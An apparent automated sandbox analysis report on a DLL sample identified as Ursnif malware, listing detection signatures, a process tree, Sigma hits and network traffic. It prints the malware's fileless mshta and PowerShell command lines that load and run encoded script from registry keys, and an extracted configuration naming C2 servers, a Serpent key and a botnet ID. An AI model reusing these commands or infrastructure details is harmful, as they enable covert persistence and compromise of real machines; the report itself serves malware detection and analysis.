Loading ...

Play interactive tourEdit tour

Windows Analysis Report 2790000.dll

Overview

General Information

Sample Name:2790000.dll
Analysis ID:444655
MD5:c40709736c45151601de6db50f379d8b
SHA1:96fcdac225106f13726477d898a4939ccfcd4781
SHA256:56b998448c4cd2240edcf0446c8bc7da54f4568ba99d1f3774c43af202aac995
Tags:dll
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Sigma detected: Encoded IEX
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6560 cmdline: loaddll32.exe 'C:\Users\user\Desktop\2790000.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 6592 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2790000.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6632 cmdline: rundll32.exe 'C:\Users\user\Desktop\2790000.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 6620 cmdline: regsvr32.exe /s C:\Users\user\Desktop\2790000.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • iexplore.exe (PID: 6672 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
      • iexplore.exe (PID: 6760 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6992 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17426 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6840 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17430 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 4980 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82966 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 1808 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82970 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 684 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82982 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5504 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17460 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 4864 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17468 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 4984 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17472 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 1016 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17480 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 4576 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83036 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6796 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17500 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5500 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83052 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5440 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17514 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6388 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17520 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5728 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:279558 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6460 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83084 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5348 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83090 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 740 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17546 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 4864 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83102 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • rundll32.exe (PID: 6716 cmdline: rundll32.exe C:\Users\user\Desktop\2790000.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • control.exe (PID: 5512 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  • mshta.exe (PID: 5492 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Vo0g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Vo0g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5872 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 5068 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5900 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD796.tmp' 'c:\Users\user\AppData\Local\Temp\rzslcw3n\CSCA64EAED44D2B4776864E5EDA5D4E8B86.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 3220 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6260 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES30B.tmp' 'c:\Users\user\AppData\Local\Temp\rpyoew2f\CSCDF3AABDF3FB34DF1A43A4F7FD45C9671.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • mshta.exe (PID: 6520 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>N4ot='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(N4ot).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6644 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 4596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4432 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5940 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1395.tmp' 'c:\Users\user\AppData\Local\Temp\xwrbq4ie\CSCC07B09CA405E4901BCF4DD90291B57CA.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • mshta.exe (PID: 3976 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Nohx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Nohx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6244 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 1740 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 1808 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1D78.tmp' 'c:\Users\user\AppData\Local\Temp\pkkmtuzt\CSC7DF2BB886B1A41BB8B841DD3834E0B8.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "uiTXezezuapGKYR5Hmb7kdSK6au8TKB7wW9g5rwW5i1COxT1S+zuTy9YoTvI7hEm3kZdxYsJDG0+aStAKO8pzy41ZgWbaYpVgP+XSgAT7qWoXdAS/gVbMTJCCqNHkAtniUmHicelSYpHYminzht/W5i+89jC9sbo8vwV/qG0cnCdraqUqpCPQT4N25ybpFXm", "c2_domain": ["cdp.geotrust.com", "217.12.221.28", "195.123.247.51", "195.123.213.89", "qpwoeirutyzmxncbp2.xyz", "pqowieurytalskdjp2.xyz", "wopqrituysakldfap2.xyz"], "dns_server": ["107.174.86.134", "107.175.127.22"], "DGA_count": "10", "ip_check_url": ["api.wipmania.com", "ipinfo.io/ip"], "server": "12", "serpent_key": "10291029JSRABBIT", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "120", "time_value": "120", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "120", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "120", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "120", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "5456", "capture_window_title?(CRC_KEYLOGLIST)": "", "SetWaitableTimer_value": "60"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.718768044.0000000001EA8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000004.00000003.792588340.0000000005208000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000004.00000003.910870766.000000000500C000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000007.00000003.743986098.0000000005848000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000003.00000003.754576282.0000000005068000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 50 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Encoded IEXShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Vo0g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Vo0g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5492, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 5872
            Sigma detected: MSHTA Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Vo0g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Vo0g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5492, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 5872
            Sigma detected: Mshta Spawning Windows ShellShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Vo0g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Vo0g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5492, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 5872
            Sigma detected: Suspicious Csc.exe Source File FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5872, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.cmdline', ProcessId: 5068
            Sigma detected: Non Interactive PowerShellShow sources
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Vo0g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Vo0g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5492, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 5872

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus / Scanner detection for submitted sampleShow sources
            Source: 2790000.dllAvira: detected
            Found malware configurationShow sources
            Source: 00000007.00000002.936762270.00000000033D0000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "uiTXezezuapGKYR5Hmb7kdSK6au8TKB7wW9g5rwW5i1COxT1S+zuTy9YoTvI7hEm3kZdxYsJDG0+aStAKO8pzy41ZgWbaYpVgP+XSgAT7qWoXdAS/gVbMTJCCqNHkAtniUmHicelSYpHYminzht/W5i+89jC9sbo8vwV/qG0cnCdraqUqpCPQT4N25ybpFXm", "c2_domain": ["cdp.geotrust.com", "217.12.221.28", "195.123.247.51", "195.123.213.89", "qpwoeirutyzmxncbp2.xyz", "pqowieurytalskdjp2.xyz", "wopqrituysakldfap2.xyz"], "dns_server": ["107.174.86.134", "107.175.127.22"], "DGA_count": "10", "ip_check_url": ["api.wipmania.com", "ipinfo.io/ip"], "server": "12", "serpent_key": "10291029JSRABBIT", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "120", "time_value": "120", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "120", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "120", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "120", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "5456", "capture_window_title?(CRC_KEYLOGLIST)": "", "SetWaitableTimer_value": "60"}
            Machine Learning detection for sampleShow sources
            Source: 2790000.dllJoe Sandbox ML: detected
            Source: 0.2.loaddll32.exe.10000000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen8
            Source: 7.2.rundll32.exe.10000000.4.unpackAvira: Label: TR/Crypt.XPACK.Gen8
            Source: 2790000.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
            Source: unknownHTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49745 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49746 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.4:49762 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.4:49761 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49763 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49764 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49765 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49766 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49768 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49767 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49809 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49810 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49811 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49821 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49822 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 195.20.250.115:443 -> 192.168.2.4:49826 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 195.20.250.115:443 -> 192.168.2.4:49827 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49837 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49836 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49839 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49838 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.4:49845 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.4:49846 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49849 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49850 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49851 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49852 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49858 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49859 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49860 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49861 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49863 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49862 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49864 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49865 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49870 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49871 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49872 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49873 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49873 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49874 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49875 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49876 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49877 version: TLS 1.2
